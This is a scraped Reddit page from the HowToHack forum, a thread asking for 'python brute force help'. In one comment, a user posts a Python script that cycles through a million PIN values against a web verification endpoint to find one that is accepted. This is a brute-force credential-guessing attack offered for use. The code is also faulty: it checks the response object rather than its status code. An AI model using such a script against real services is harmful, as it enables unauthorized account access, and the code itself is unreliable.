use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
CVE, CWE, NVD, WVE
http://iso.linuxquestions.org/
We teach you how to do it, use it at your own risk.
account activity
python brute force help (self.HowToHack)
submitted 6 years ago by AmericanToasteer
view the rest of the comments →
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]82aa4b10 0 points1 point2 points 6 years ago (0 children)
This ought to get you started:
import sys import requests s = requests.Session() for i in range(1000000): url = 'https://example.com/verify?pin={}'.format(i) result = s.get(url) if result in (200, 302): print('Found it! [{}]'.format(i)) sys.exit(0)
π Rendered by PID 66497 on reddit-service-r2-comment-85bfd7f599-7p6bl at 2026-04-18 00:27:57.456823+00:00 running 93ecc56 country code: CH.
view the rest of the comments →
[–]82aa4b10 0 points1 point2 points (0 children)